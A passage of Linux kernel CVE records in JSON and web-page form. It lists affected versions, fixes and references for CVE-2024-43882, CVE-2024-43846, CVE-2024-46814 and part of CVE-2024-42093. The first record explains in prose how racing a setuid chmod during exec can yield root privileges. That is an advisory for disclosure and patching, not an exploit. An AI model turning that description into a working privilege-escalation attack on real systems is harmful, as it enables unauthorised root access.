              "lessThan": "d5c3c7e26275a2d83b894d30f7582a42853a958f",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "368f6985d46657b8b466a421dddcacd4051f7ada",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "15469d46ba34559bfe7e3de6659115778c624759",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "9b424c5d4130d56312e2a3be17efb0928fec4d64",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "f6cfc6bcfd5e1cf76115b6450516ea4c99897ae1",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "d2a2a4714d80d09b0f8eb6438ab4224690b7121e",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "90dfbba89ad4f0d9c9744ecbb1adac4aa2ff4f3e",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            },
            {
              "lessThan": "f50733b45d865f91db90919f8311e2127ce5a0cb",
              "status": "affected",
              "version": "9167b0b9a0ab7907191523f5a0528e3b9c288e21",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/exec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.18"
            },
            {
              "lessThan": "2.6.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.106",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.47",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.106",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.47",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.6",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nexec: Fix ToCToU between perm check and set-uid/gid usage\n\nWhen opening a file for exec via do_filp_open(), permission checking is\ndone against the file\u0027s metadata at that moment, and on success, a file\npointer is passed back. Much later in the execve() code path, the file\nmetadata (specifically mode, uid, and gid) is used to determine if/how\nto set the uid and gid. However, those values may have changed since the\npermissions check, meaning the execution may gain unintended privileges.\n\nFor example, if a file could change permissions from executable and not\nset-id:\n\n---------x 1 root root 16048 Aug  7 13:16 target\n\nto set-id and non-executable:\n\n---S------ 1 root root 16048 Aug  7 13:16 target\n\nit is possible to gain root privileges when execution should have been\ndisallowed.\n\nWhile this race condition is rare in real-world scenarios, it has been\nobserved (and proven exploitable) when package managers are updating\nthe setuid bits of installed programs. Such files start with being\nworld-executable but then are adjusted to be group-exec with a set-uid\nbit. For example, \"chmod o-x,u+s target\" makes \"target\" executable only\nby uid \"root\" and gid \"cdrom\", while also becoming setuid-root:\n\n-rwxr-xr-x 1 root cdrom 16048 Aug  7 13:16 target\n\nbecomes:\n\n-rwsr-xr-- 1 root cdrom 16048 Aug  7 13:16 target\n\nBut racing the chmod means users without group \"cdrom\" membership can\nget the permission to execute \"target\" just before the chmod, and when\nthe chmod finishes, the exec reaches brpm_fill_uid(), and performs the\nsetuid to root, violating the expressed authorization of \"only cdrom\ngroup members can setuid to root\".\n\nRe-check that we still have execute permissions in case the metadata\nhas changed. It would be better to keep a copy from the perm-check time,\nbut until we can do that refactoring, the least-bad option is to do a\nfull inode_permission() call (under inode lock). It is understood that\nthis is safe against dead-locks, but hardly optimal."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:17.718Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d5c3c7e26275a2d83b894d30f7582a42853a958f"
        },
        {
          "url": "https://git.kernel.org/stable/c/368f6985d46657b8b466a421dddcacd4051f7ada"
        },
        {
          "url": "https://git.kernel.org/stable/c/15469d46ba34559bfe7e3de6659115778c624759"
        },
        {
          "url": "https://git.kernel.org/stable/c/9b424c5d4130d56312e2a3be17efb0928fec4d64"
        },
        {
          "url": "https://git.kernel.org/stable/c/f6cfc6bcfd5e1cf76115b6450516ea4c99897ae1"
        },
        {
          "url": "https://git.kernel.org/stable/c/d2a2a4714d80d09b0f8eb6438ab4224690b7121e"
        },
        {
          "url": "https://git.kernel.org/stable/c/90dfbba89ad4f0d9c9744ecbb1adac4aa2ff4f3e"
        },
        {
          "url": "https://git.kernel.org/stable/c/f50733b45d865f91db90919f8311e2127ce5a0cb"
        }
      ],
      "title": "exec: Fix ToCToU between perm check and set-uid/gid usage",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43882",
    "datePublished": "2024-08-21T00:10:49.556Z",
    "dateReserved": "2024-08-17T09:11:59.287Z",
    "dateUpdated": "2026-01-05T10:52:17.718Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43846 (GCVE-0-2024-43846)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:22 – Updated: 2025-11-03 22:05

Title

lib: objagg: Fix general protection fault

Summary

In the Linux kernel, the following vulnerability has been resolved: lib: objagg: Fix general protection fault The library supports aggregation of objects into other objects only if the parent object does not have a parent itself. That is, nesting is not supported. Aggregation happens in two cases: Without and with hints, where hints are a pre-computed recommendation on how to aggregate the provided objects. Nesting is not possible in the first case due to a check that prevents it, but in the second case there is no check because the assumption is that nesting cannot happen when creating objects based on hints. The violation of this assumption leads to various warnings and eventually to a general protection fault [1]. Before fixing the root cause, error out when nesting happens and warn. [1] general protection fault, probably for non-canonical address 0xdead000000000d90: 0000 [#1] PREEMPT SMP PTI CPU: 1 PID: 1083 Comm: kworker/1:9 Tainted: G W 6.9.0-rc6-custom-gd9b4f1cca7fb #7 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work RIP: 0010:mlxsw_sp_acl_erp_bf_insert+0x25/0x80 [...] Call Trace: <TASK> mlxsw_sp_acl_atcam_entry_add+0x256/0x3c0 mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0 mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270 mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510 process_one_work+0x151/0x370 worker_thread+0x2cb/0x3e0 kthread+0xd0/0x100 ret_from_fork+0x34/0x50 ret_from_fork_asm+0x1a/0x30 </TASK>

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8161263362154cbeb…
	https://git.kernel.org/stable/c/22ae17a267f481286…
	https://git.kernel.org/stable/c/565213e005557eb6c…
	https://git.kernel.org/stable/c/5adc61d29bbb461d7…
	https://git.kernel.org/stable/c/1936fa05a180834c3…
	https://git.kernel.org/stable/c/499f742fed42e74f1…
	https://git.kernel.org/stable/c/b4a3a89fffcdf0970…

Impacted products

Vendor

Product

Version

Linux

Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 8161263362154cbebfbf4808097b956a6a8cb98a (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 22ae17a267f4812861f0c644186c3421ff97dbfc (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 565213e005557eb6cc4e42189d26eb300e02f170 (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 5adc61d29bbb461d7f7c2b48dceaa90ecd182eb7 (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 1936fa05a180834c3b52e0439a6bddc07814d3eb (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < 499f742fed42e74f1321f4b12ca196a66a2b49fc (git)
Affected: 9069a3817d82b01b3a55da382c774e3575946130 , < b4a3a89fffcdf09702b1f161b914e52abca1894d (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43846",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:07:39.903240Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:21.861Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:05:41.549Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "lib/objagg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8161263362154cbebfbf4808097b956a6a8cb98a",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "22ae17a267f4812861f0c644186c3421ff97dbfc",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "565213e005557eb6cc4e42189d26eb300e02f170",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "5adc61d29bbb461d7f7c2b48dceaa90ecd182eb7",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "1936fa05a180834c3b52e0439a6bddc07814d3eb",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "499f742fed42e74f1321f4b12ca196a66a2b49fc",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            },
            {
              "lessThan": "b4a3a89fffcdf09702b1f161b914e52abca1894d",
              "status": "affected",
              "version": "9069a3817d82b01b3a55da382c774e3575946130",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "lib/objagg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib: objagg: Fix general protection fault\n\nThe library supports aggregation of objects into other objects only if\nthe parent object does not have a parent itself. That is, nesting is not\nsupported.\n\nAggregation happens in two cases: Without and with hints, where hints\nare a pre-computed recommendation on how to aggregate the provided\nobjects.\n\nNesting is not possible in the first case due to a check that prevents\nit, but in the second case there is no check because the assumption is\nthat nesting cannot happen when creating objects based on hints. The\nviolation of this assumption leads to various warnings and eventually to\na general protection fault [1].\n\nBefore fixing the root cause, error out when nesting happens and warn.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdead000000000d90: 0000 [#1] PREEMPT SMP PTI\nCPU: 1 PID: 1083 Comm: kworker/1:9 Tainted: G        W          6.9.0-rc6-custom-gd9b4f1cca7fb #7\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:mlxsw_sp_acl_erp_bf_insert+0x25/0x80\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_entry_add+0x256/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270\n mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:27:35.155Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8161263362154cbebfbf4808097b956a6a8cb98a"
        },
        {
          "url": "https://git.kernel.org/stable/c/22ae17a267f4812861f0c644186c3421ff97dbfc"
        },
        {
          "url": "https://git.kernel.org/stable/c/565213e005557eb6cc4e42189d26eb300e02f170"
        },
        {
          "url": "https://git.kernel.org/stable/c/5adc61d29bbb461d7f7c2b48dceaa90ecd182eb7"
        },
        {
          "url": "https://git.kernel.org/stable/c/1936fa05a180834c3b52e0439a6bddc07814d3eb"
        },
        {
          "url": "https://git.kernel.org/stable/c/499f742fed42e74f1321f4b12ca196a66a2b49fc"
        },
        {
          "url": "https://git.kernel.org/stable/c/b4a3a89fffcdf09702b1f161b914e52abca1894d"
        }
      ],
      "title": "lib: objagg: Fix general protection fault",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43846",
    "datePublished": "2024-08-17T09:22:00.481Z",
    "dateReserved": "2024-08-17T09:11:59.275Z",
    "dateUpdated": "2025-11-03T22:05:41.549Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46814 (GCVE-0-2024-46814)

Vulnerability from cvelistv5 – Published: 2024-09-27 12:35 – Updated: 2025-11-03 22:18

Title

drm/amd/display: Check msg_id before processing transcation

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check msg_id before processing transcation [WHY & HOW] HDCP_MESSAGE_ID_INVALID (-1) is not a valid msg_id nor is it a valid array index, and it needs checking before used. This fixes 4 OVERRUN issues reported by Coverity.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/91608305467006002…
	https://git.kernel.org/stable/c/fe63daf7b10253b0f…
	https://git.kernel.org/stable/c/0147505f08220c89b…
	https://git.kernel.org/stable/c/cb63090a17d3abb87…
	https://git.kernel.org/stable/c/6590643c5de74098d…
	https://git.kernel.org/stable/c/fa71face755e27dc4…

Impacted products

Vendor

Product

Version

Linux

Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < 916083054670060023d3f8a8ace895d710e268f4 (git)
Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < fe63daf7b10253b0faaa60c55d6153cd276927aa (git)
Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < 0147505f08220c89b3a9c90eb608191276e263a8 (git)
Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < cb63090a17d3abb87f132851fa3711281249b7d2 (git)
Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < 6590643c5de74098d27933b7d224d5ac065d7755 (git)
Affected: 4c283fdac08abf3211533f70623c90a34f41d08d , < fa71face755e27dc44bc296416ebdf2c67163316 (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.109 , ≤ 6.1.* (semver)
Unaffected: 6.6.50 , ≤ 6.6.* (semver)
Unaffected: 6.10.9 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46814",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:18:22.999076Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:18:35.019Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:18:56.363Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "916083054670060023d3f8a8ace895d710e268f4",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            },
            {
              "lessThan": "fe63daf7b10253b0faaa60c55d6153cd276927aa",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            },
            {
              "lessThan": "0147505f08220c89b3a9c90eb608191276e263a8",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            },
            {
              "lessThan": "cb63090a17d3abb87f132851fa3711281249b7d2",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            },
            {
              "lessThan": "6590643c5de74098d27933b7d224d5ac065d7755",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            },
            {
              "lessThan": "fa71face755e27dc44bc296416ebdf2c67163316",
              "status": "affected",
              "version": "4c283fdac08abf3211533f70623c90a34f41d08d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/hdcp/hdcp_msg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.109",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.50",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.109",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.50",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Check msg_id before processing transcation\n\n[WHY \u0026 HOW]\nHDCP_MESSAGE_ID_INVALID (-1) is not a valid msg_id nor is it a valid\narray index, and it needs checking before used.\n\nThis fixes 4 OVERRUN issues reported by Coverity."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:13:16.245Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/916083054670060023d3f8a8ace895d710e268f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe63daf7b10253b0faaa60c55d6153cd276927aa"
        },
        {
          "url": "https://git.kernel.org/stable/c/0147505f08220c89b3a9c90eb608191276e263a8"
        },
        {
          "url": "https://git.kernel.org/stable/c/cb63090a17d3abb87f132851fa3711281249b7d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/6590643c5de74098d27933b7d224d5ac065d7755"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa71face755e27dc44bc296416ebdf2c67163316"
        }
      ],
      "title": "drm/amd/display: Check msg_id before processing transcation",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46814",
    "datePublished": "2024-09-27T12:35:56.434Z",
    "dateReserved": "2024-09-11T15:12:18.283Z",
    "dateUpdated": "2025-11-03T22:18:56.363Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42093 (GCVE-0-2024-42093)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2025-11-03 22:01

Title

net/dpaa2: Avoid explicit cpumask var allocation on stack

Summary

In the Linux kernel, the following vulnerability has been resolved: net/dpaa2: Avoid explicit cpumask var allocation on stack For CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumask variable on stack is not recommended since it can cause potential stack overflow. Instead, kernel code should always use *cpumask_var API(s) to allocate cpumask var in config-neutral way, leaving allocation strategy to CONFIG_CPUMASK_OFFSTACK. Use *cpumask_var API(s) to address it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b2262b3be27cee334…
	https://git.kernel.org/stable/c/763896ab62a672d72…
	https://git.kernel.org/stable/c/a55afc0f5f20ba309…
	https://git.kernel.org/stable/c/48147337d7efdea6a…
	https://git.kernel.org/stable/c/69f49527aea12c23b…
	https://git.kernel.org/stable/c/5e4f25091e6d06e99…
	https://git.kernel.org/stable/c/d33fe1714a44ff540…

Impacted products

Vendor

Product

Version

Linux

Affected: 93ddf0b211a0a0367d01c9587169c16ed77b4b98 , < b2262b3be27cee334a2fa175ae3afb53f38fb0b1 (git)
